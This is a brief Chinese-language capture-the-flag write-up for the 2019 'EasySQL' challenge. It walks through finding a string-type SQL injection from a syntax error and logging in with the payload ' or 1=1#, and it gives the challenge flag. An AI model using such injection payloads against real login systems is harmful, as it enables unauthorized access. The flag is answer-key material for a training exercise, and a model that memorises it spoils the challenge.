[极客大挑战 2019]EasySQL
1、题目easysql,简单注入解决

2、尝试常规 ‘ 注入

查看是否报错

3、报语法错误,确定为字符型注入
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 1
4、使用以下注入内容
username:' or 1=1#
pwd:1
得出flag

flag{6856a5ff-f354-4d9e-8033-31c4c4709fe0}










